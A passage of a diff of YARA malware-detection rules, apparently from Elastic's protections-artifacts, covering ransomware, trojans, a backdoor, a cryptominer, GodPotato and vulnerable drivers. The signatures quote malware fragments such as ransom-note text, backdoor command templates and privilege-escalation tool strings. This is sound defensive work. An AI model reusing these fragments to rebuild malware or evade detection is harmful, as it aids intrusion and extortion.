"7d93c26c9e069af5cef964f5747104ba6d1d0d030a1f6b1c377355223c5359a1" + fingerprint = "c8fbeae6cf935fe629c37abc4fdcda2c80c1b19fc8b6185a58decead781e1321" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76305,88 +76402,85 @@ rule ELASTIC_Linux_Ransomware_Gonnacry_53C3832D : FILE MEMORY os = "linux" strings: - $a = { 55 48 89 E5 48 83 EC 10 48 89 7D F8 EB 56 48 8B 45 F8 48 8B } + $a = { FE D7 C5 D9 72 F2 09 C5 E9 72 D2 17 C5 E9 EF D4 C5 E9 EF D6 C5 C1 } condition: all of them } -rule ELASTIC_Macos_Trojan_Hloader_A3945Baf : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Bulz_0998F811 : FILE MEMORY { meta: - description = "Detects Macos Trojan Hloader (MacOS.Trojan.HLoader)" + description = "Detects Linux Cryptominer Bulz (Linux.Cryptominer.Bulz)" author = "Elastic Security" - id = "a3945baf-4708-4a0b-8a9b-1a5448ee4bc7" - date = "2023-10-23" - modified = "2023-10-23" + id = "0998f811-7be3-4d46-9dcb-1e8a0f19bab5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_HLoader.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1" - logic_hash = "0383485b6bbcdae210a6c949f6796023b2f7ec3f1edbd2116207fc2b75a67849" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Bulz.yar#L20-L37" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "178f6c42582dd99cc5418388d020d4d76f2a9204297a673359fe0a300121c35b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a48ec79f07a6a53611b1d1e8fe938513ec0ea19344126e07331b48b028cb877e" + fingerprint = "c8a83bc305998cb6256b004e9d8ce6d5d1618b107e42be139b73807462b53c31" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $seq_main = { 74 ?? 49 89 C7 48 89 D8 4C 89 FF E8 ?? ?? ?? ?? 48 89 DF 31 F6 BA ?? ?? ?? ?? 4C 89 65 ?? 4D 89 F4 4C 89 F1 4C 8B 75 ?? 41 FF 56 ?? } - $seq_exec = { 48 B8 00 00 00 00 00 00 00 E0 48 89 45 ?? 4C 8D 6D ?? BF 11 00 00 00 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 48 BF 65 78 65 63 46 69 6C 65 48 BE 20 65 72 72 6F 72 20 EF } - $seq_rename = { 41 89 DE 84 DB 74 ?? 48 8B 7D ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? } + $a = { 79 70 E4 39 C5 F9 70 C9 4E C5 91 72 F0 12 C5 F9 72 D0 0E C5 91 } condition: - 2 of ($seq*) + all of them } -rule ELASTIC_Windows_Ransomware_Rook_Ee21Fa67 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Lala_51Deb1F9 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Rook (Windows.Ransomware.Rook)" + description = "Detects Linux Trojan Lala (Linux.Trojan.Lala)" author = "Elastic Security" - id = "ee21fa67-bd82-40fb-9c6d-bab5abfe14b3" - date = "2022-01-14" - modified = "2022-04-12" + id = "51deb1f9-2d5f-4c41-99f3-138c15c35804" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Rook.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c2d46d256b8f9490c9599eea11ecef19fde7d4fdd2dea93604cee3cea8e172ac" - logic_hash = "6fe19cfc572a3dceba5e26615d111a3c0fa1036e275a5640a5c5a8f8cdaf6dc1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Lala.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3af65d3307fbdc2e8ce6e1358d1413ebff5eeb5dbedc051394377a4dabffa82" + logic_hash = "73a7ec230be9aabcc301095c9c075f839852155419bdd8d5542287f34699ab33" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8ef731590e73f79a13d04db39e58b03d0a29fd8e46a0584b0fcaf57ac0efe473" + fingerprint = "220bcaa4f18b9474ddd3da921e1189d17330f0eb98fa55a193127413492fb604" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 01 75 09 8B C3 FF C3 48 89 74 C5 F0 48 FF C7 48 83 FF 1A 7C DB } + $a = { D9 7C F3 89 D8 83 7D FC 00 7D 02 F7 D8 8B 55 08 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Royal_B7D42109 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Microbackdoor_903E33C3 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Royal (Windows.Ransomware.Royal)" + description = "Detects Windows Trojan Microbackdoor (Windows.Trojan.MicroBackdoor)" author = "Elastic Security" - id = "b7d42109-f327-4ec3-86ac-d1ebb9478860" - date = "2022-11-04" - modified = "2022-12-20" + id = "903e33c3-d8f1-4c3b-900b-7503edb11951" + date = "2022-03-07" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Royal.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "491c2b32095174b9de2fd799732a6f84878c2e23b9bb560cd3155cbdc65e2b80" - logic_hash = "06f4a1487e97e0b8c1f5df380ab4f90b37ef0a508aba7dac272c16c8371d8143" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_MicroBackdoor.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fbbfcc81a976b57739ef13c1545ea4409a1c69720469c05ba249a42d532f9c21" + logic_hash = "5f96f68df442eb1da21d87c3ae954c4e36cf87db583cbef1775f8ca9e76b776e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ff518f25b39b02769b67c437f38958d14e4e8f50b91f4c73591203da297a5d2a" + fingerprint = "06b3c0164c2d06f50d1e6ae0a9edf823ae1fef53574e0d20020aada8721dfee0" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76394,31 +76488,28 @@ rule ELASTIC_Windows_Ransomware_Royal_B7D42109 : FILE MEMORY os = "windows" strings: - $a1 = "Try Royal today and enter the new era of data security" ascii fullword - $a2 = "If you are reading this, it means that your system were hit by Royal ransomware." ascii fullword - $a3 = "http://royal" - $a4 = "\\README.TXT" wide fullword + $a = { 55 8B EC 83 EC 1C 56 57 E8 33 01 00 00 8B F8 85 FF 74 48 BA 26 80 AC C8 8B CF E8 E1 01 00 00 BA } condition: all of them } -rule ELASTIC_Windows_Trojan_Tofsee_26124Fe4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Microbackdoor_46F2E5Fd : FILE MEMORY { meta: - description = "Detects Windows Trojan Tofsee (Windows.Trojan.Tofsee)" + description = "Detects Windows Trojan Microbackdoor (Windows.Trojan.MicroBackdoor)" author = "Elastic Security" - id = "26124fe4-f2a1-4fc9-8155-585b581476de" - date = "2022-03-31" + id = "46f2e5fd-edea-4321-b38c-7478b47f054b" + date = "2022-03-07" modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Tofsee.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494" - logic_hash = "e765953dec7c7b2a1fbebf92c2fff46453c8258722ad5ca92ba4c7526a8b0c66" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_MicroBackdoor.yar#L21-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fbbfcc81a976b57739ef13c1545ea4409a1c69720469c05ba249a42d532f9c21" + logic_hash = "580be4c5b058916c2bc67a7964522a7c369bb254394e3cedbf0da025105231c4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31" + fingerprint = "d4e410b9c36c1d5206f5d17190ef4e5fd4b4e4d40acad703775aed085a08ef7c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76426,29 +76517,33 @@ rule ELASTIC_Windows_Trojan_Tofsee_26124Fe4 : FILE MEMORY os = "windows" strings: - $a = { 55 8B EC 8B 45 ?? 57 8B 7D ?? B1 01 85 FF 74 ?? 56 8B 75 ?? 2B F0 8A 14 06 32 55 ?? 88 10 8A D1 02 55 ?? F6 D9 00 55 ?? 40 4F 75 ?? 5E 8B 45 ?? 5F 5D C3 } - $b = { 8B 44 24 ?? 53 8A 18 84 DB 74 ?? 8B D0 2B 54 24 ?? 8B 4C 24 ?? 84 DB 74 ?? 8A 19 84 DB 74 ?? 38 1C 0A 75 ?? 41 80 3C 0A 00 75 ?? 80 39 00 74 ?? 40 8A 18 42 84 DB 75 ?? 33 C0 5B C3 } + $a1 = "cmd.exe /C \"%s%s\"" wide fullword + $a2 = "%s|%s|%d|%s|%d|%d" wide fullword + $a3 = "{{{$%.8x}}}" ascii fullword + $a4 = "30D78F9B-C56E-472C-8A29-E9F27FD8C985" ascii fullword + $a5 = "chcp 65001 > NUL & " wide fullword + $a6 = "CONNECT %s:%d HTTP/1.0" ascii fullword condition: - any of them + 5 of them } -rule ELASTIC_Windows_Hacktool_Godpotato_5F1Aad81 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Snake_550E0265 : BETA FILE MEMORY { meta: - description = "Detects Windows Hacktool Godpotato (Windows.Hacktool.GodPotato)" + description = "Identifies SNAKE ransomware" author = "Elastic Security" - id = "5f1aad81-88d8-4561-a6f9-d7521b9ffdf5" - date = "2024-06-24" - modified = "2024-07-02" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_GodPotato.yar#L1-L28" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "00171bb6e9e4a9b8601e988a8c4ac6f5413e31e1b6d86d24b0b53520cd02184c" - logic_hash = "3028c84a616d47b37b4ef2d41d35ccef5121c06aa042096bca8ea53b528a1eb9" + id = "550e0265-fca9-46df-9d5a-cf3ef7efc7ff" + date = "2020-06-30" + modified = "2021-08-23" + reference = "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Snake.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "d9c2f6961a4ef560743060ed176bdc606561ca1b8270b8826cb0dbadaf4e5dbc" score = 75 - quality = 25 - tags = "FILE, MEMORY" - fingerprint = "3645a259f9b5d07bd5ad2ec823fd704eccd0412dd75c47bc82124db9a907da2a" + quality = 75 + tags = "BETA, FILE, MEMORY" + fingerprint = "f2796560ddc85ad98a5ef4f0d7323948d57116813c8a26ab902fdfde849704e0" + threat_name = "Windows.Ransomware.Snake" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76456,66 +76551,62 @@ rule ELASTIC_Windows_Hacktool_Godpotato_5F1Aad81 : FILE MEMORY os = "windows" strings: - $a1 = "GodPotato" wide fullword - $a2 = "GodPotatoContext was not initialized" wide fullword - $a3 = "GodPotatoStorageTrigger" ascii fullword - $a4 = "[*] DCOM obj GUID: {0}" wide fullword - $a5 = "[*] DispatchTable: 0x{0:x}" wide fullword - $a6 = "[*] UseProtseqFunction: 0x{0:x}" wide fullword - $a7 = "[*] process start with pid {0}" wide fullword - $a8 = "[!] ImpersonateNamedPipeClient fail error:{0}" wide fullword - $a9 = "[*] CoGetInstanceFromIStorage: 0x{0:x}" wide fullword - $a10 = "[*] Trigger RPCS" wide + $a1 = "Go build ID: \"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\"" ascii fullword + $a2 = "We breached your corporate network and encrypted the data on your computers." + $a3 = "c:\\users\\public\\desktop\\Fix-Your-Files.txt" nocase + $a4 = "%System Root%\\Fix-Your-Files.txt" nocase + $a5 = "%Desktop%\\Fix-Your-Files.txt" nocase condition: - 5 of them + 1 of ($a*) } -rule ELASTIC_Windows_Shellcode_Rdi_Edc62A10 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Snake_119F9C83 : BETA FILE MEMORY { meta: - description = "Detects Windows Shellcode Rdi (Windows.Shellcode.Rdi)" + description = "Identifies SNAKE ransomware" author = "Elastic Security" - id = "edc62a10-7cb1-4fda-a15c-86d40d510ffd" - date = "2023-06-23" - modified = "2023-07-10" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Shellcode_Rdi.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "64485ffc283e981c8b77db5a675c7ba2a04d3effaced522531185aa46eb6a36b" - logic_hash = "986cb6c28d2d9767a2fd084fdd71edb7a1c36e78ddedf3c562076cf6f5b5afd1" + id = "119f9c83-4b55-47ce-8c0d-3799a7b46369" + date = "2020-06-30" + modified = "2021-08-23" + reference = "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Snake.yar#L26-L46" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "cf6c81e7332acc798409a05a548460bad0ac3621402672c242e48a1b6bccdae6" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "1cee85457eb31be126a41d4e332735957cf4a928fdf4b5253380b6c97605d069" - severity = 90 + tags = "BETA, FILE, MEMORY" + fingerprint = "13ffd63c31df2cbaa6988abcaff3b0a3518437f1d37dcd872817b9cbdb61576f" + threat_name = "Windows.Ransomware.Snake" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { E8 00 00 00 00 59 49 89 C8 48 81 C1 23 0B 00 00 BA [10] 00 41 B9 04 00 00 00 56 48 89 E6 48 83 E4 F0 48 83 EC 30 C7 } + $c1 = { 00 40 83 7C 00 40 9E 7C 00 60 75 7C 00 B0 6C 7C 00 B0 74 7C 00 D0 74 7C 00 B0 59 7C 00 D0 59 7C 00 F0 59 7C 00 10 5A 7C 00 30 5A 7C 00 50 5A 7C 00 70 5A 7C 00 90 5A 7C 00 B0 5A 7C 00 D0 5A 7C 00 D0 6C 7C 00 F0 5A 7C 00 30 5B 7C 00 50 5B 7C 00 70 5B 7C 00 90 5B 7C 00 D0 5E 7C 00 B0 5B 7C 00 D0 5B 7C 00 F0 5B 7C 00 50 60 7C 00 70 61 7C 00 10 5C 7C 00 30 5C 7C 00 50 5C 7C 00 10 63 7C 00 70 5C 7C 00 90 5C 7C 00 90 64 7C 00 B0 5C 7C 00 F0 5C 7C 00 10 5D 7C 00 F0 6C 7C 00 10 6D 7C 00 30 5D 7C 00 50 5D 7C 00 30 6D 7C 00 90 71 7C 00 70 5D 7C 00 90 5D 7C 00 B0 5D 7C 00 D0 5D 7C 00 70 6D 7C 00 F0 5D 7C 00 10 5E 7C 00 30 5E 7C 00 50 5E 7C 00 70 5E 7C 00 90 5E 7C 00 B0 5E 7C 00 F0 5E 7C 00 10 5F 7C 00 30 5F 7C 00 50 5F 7C 00 70 5F 7C 00 90 6D 7C 00 90 5F 7C 00 B0 6D 7C 00 D0 6D 7C 00 F0 6D 7C 00 10 6E 7C 00 B0 5F 7C 00 D0 5F 7C 00 F0 5F 7C 00 10 60 7C 00 30 60 7C 00 30 6E 7C 00 70 60 7C } + $c2 = { 00 30 64 7C 00 50 64 7C 00 70 64 7C 00 B0 64 7C 00 D0 64 7C 00 30 73 7C 00 F0 64 7C 00 90 71 7C 00 10 65 7C 00 30 65 7C 00 50 65 7C 00 90 72 7C 00 B0 72 7C 00 70 6E 7C 00 70 65 7C 00 B0 65 7C 00 D0 65 7C 00 F0 65 7C 00 10 66 7C 00 30 66 7C 00 50 66 7C 00 70 66 7C 00 90 66 7C 00 B0 66 7C 00 D0 66 7C 00 F0 66 7C 00 30 67 7C 00 90 6E 7C 00 B0 6E 7C 00 D0 6E 7C } condition: - all of them + 1 of ($c*) } -rule ELASTIC_Windows_Shellcode_Rdi_Eee75D2C : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Snake_20Bc5Abc : BETA FILE MEMORY { meta: - description = "Detects Windows Shellcode Rdi (Windows.Shellcode.Rdi)" + description = "Identifies SNAKE ransomware" author = "Elastic Security" - id = "eee75d2c-78ef-460f-be96-4638443952fb" - date = "2023-08-25" - modified = "2023-11-02" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Shellcode_Rdi.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8c4de69e89dcc659d2fff52d695764f1efd7e64e0a80983ce6d0cb9eeddb806c" - logic_hash = "18cd9be4af210686872610f832ac0ad58a48588a1226fc6093348ceb8371c6b4" + id = "20bc5abc-c519-47d2-a6de-5108071a9144" + date = "2020-06-30" + modified = "2021-08-23" + reference = "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Snake.yar#L48-L67" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "f3d8a523e04e516e8e059c9f13df355e6caf29a528cfebdf730e3a7d135e3351" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "2b8f840cecec00ce3112ea58e4e957e1b0754380e14a8fc8a39abc36feb077e9" + tags = "BETA, FILE, MEMORY" + fingerprint = "e7f1be2bd7e1f39b79ac89cf58c90abdb537ff54cbf161192d997e054d3f0883" + threat_name = "Windows.Ransomware.Snake" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76523,28 +76614,57 @@ rule ELASTIC_Windows_Shellcode_Rdi_Eee75D2C : FILE MEMORY os = "windows" strings: - $a = { 81 EC 14 01 00 00 53 55 56 57 6A 6B 58 6A 65 66 89 84 24 CC 00 00 00 33 ED 58 6A 72 59 6A 6E 5B 6A 6C 5A 6A 33 } + $b1 = { 57 12 1A 10 1A 10 1A 10 1A 10 1A 10 1A 10 1A 10 1A 10 1A 10 1A } condition: - all of them + 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Swrort_5Ad1A4F9 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Amifldrv_E387D5Ad : FILE { meta: - description = "Detects Linux Trojan Swrort (Linux.Trojan.Swrort)" + description = "Detects Windows Vulndriver Amifldrv (Windows.VulnDriver.Amifldrv)" author = "Elastic Security" - id = "5ad1a4f9-bfe5-4e5f-94e9-4983c93a1c1f" - date = "2021-01-12" - modified = "2021-09-16" + id = "e387d5ad-fde8-401b-bdcf-044c4f7f5fbd" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Swrort.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fa5695c355a6dc1f368a4b36a45e8f18958dacdbe0eac80c618fbec976bac8fe" - logic_hash = "3a1fa978e0c8ab0dd4e7965a3f91306d6123c19f21b86d3f8088979bf58c3a07" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Amifldrv.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330" + logic_hash = "14d75b5aff2c82d69b041c654cdc0840f6b6e37a197f5c0c1c2698c9e8eba3e2" + score = 60 + quality = 55 + tags = "FILE" + fingerprint = "03f898088f37f3c9991fb70d7fb8548908cfac4e03bb2bfe88b11a65157909a8" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $str1 = "\\amifldrv64.pdb" + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 +} +rule ELASTIC_Linux_Ransomware_Hive_Bdc7De59 : FILE MEMORY +{ + meta: + description = "Detects Linux Ransomware Hive (Linux.Ransomware.Hive)" + author = "Elastic Security" + id = "bdc7de59-bf12-461f-99e0-ec2532ace4e9" + date = "2022-01-05" + modified = "2022-01-26" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Hive.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "713b699c04f21000fca981e698e1046d4595f423bd5741d712fd7e0bc358c771" + logic_hash = "33908128258843d63c5dfe5acf15cfd68463f5cbdf08b88ef1bba394058a5a92" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a91458dd4bcd082506c554ca8479e1b0d23598e0e9a0e44ae1afb2651ce38dce" + fingerprint = "415ef589a1c2da6b16ab30fb68f938a9ee7917f5509f73aa90aeec51c10dc1ff" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76552,57 +76672,95 @@ rule ELASTIC_Linux_Trojan_Swrort_5Ad1A4F9 : FILE MEMORY os = "linux" strings: - $a = { 53 57 68 B7 E9 38 FF FF D5 53 53 57 68 74 EC 3B E1 FF D5 57 } + $a = { 40 03 4C 39 C1 73 3A 4C 89 84 24 F0 00 00 00 48 89 D3 48 89 CF 4C } condition: all of them } -rule ELASTIC_Linux_Trojan_Swrort_4Cb5B116 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Fiddrv_E7875A5A : FILE { meta: - description = "Detects Linux Trojan Swrort (Linux.Trojan.Swrort)" + description = "Detects Intel's R/W MSR driver (fiddrv64.sys)" author = "Elastic Security" - id = "4cb5b116-5e90-4e5f-a62f-bfe616cab5db" - date = "2021-01-12" - modified = "2021-09-16" + id = "e7875a5a-5a88-4bc3-9cfc-91b446dcc6aa" + date = "2023-07-25" + modified = "2023-07-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Swrort.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "703c16d4fcc6f815f540d50d8408ea00b4cf8060cc5f6f3ba21be047e32758e0" - logic_hash = "9404856fc3290f3a8f9bf891fde9a614fc4484719eb3b51ce7ab601a41e0c3a5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Vulndriver_FidDrv.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4bf4cced4209c73aa37a9e2bf9ff27d458d8d7201eefa6f6ad4849ee276ad158" + logic_hash = "aa1635c651c8364ad2ee93b369dd583fce699001d753e46de013c476d185eef1" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "ed9ef63a9e2434a30f22f679edb99b9104eb4397968d84599c7828102312025e" + threat_name = "Windows.VulnDriver.FidDrv" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $subject = { 06 03 55 04 03 [2] 49 6E 74 65 6C 28 52 29 20 50 72 6F 63 65 73 73 6F 72 20 49 64 65 6E 74 69 66 69 63 61 74 69 6F 6E 20 55 74 69 6C 69 74 79 } + $read_msr = { 53 55 57 56 52 41 50 0F 32 41 58 41 89 10 5A 89 02 B8 01 00 00 00 5E 5F 5D 5B C3 } + $write_msr = { 53 55 57 56 48 8B C2 49 8B D0 0F 30 B8 01 00 00 00 5E 5F 5D 5B C3 } + $ioctl_check = { 48 8B 82 B8 00 00 00 8B 48 18 81 E9 84 2A 22 00 0F 84 ?? ?? ?? ?? 83 E9 04 } + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and all of them +} +rule ELASTIC_Windows_Trojan_Doorme_246Eda61 : FILE MEMORY +{ + meta: + description = "Detects Windows Trojan Doorme (Windows.Trojan.DoorMe)" + author = "Elastic Security" + id = "246eda61-23b5-49b8-8409-623f2722c289" + date = "2022-12-09" + modified = "2022-12-15" + reference = "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DoorMe.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f" + logic_hash = "01240f2e23904498c34ec805cc8bc3e9ac7b76c6519685ef6b367066f1a0bc5b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cb783f69b4074264a75894dd85459529a172404a6901a1f5753a2f9197bfca58" + fingerprint = "aa8c2ae2e966bf4e0c79faa90b14fd77d07b7c68076f39c56b384dada9dd0e96" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 04 6A 10 89 E1 6A 00 } + $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? } + $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? } + $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 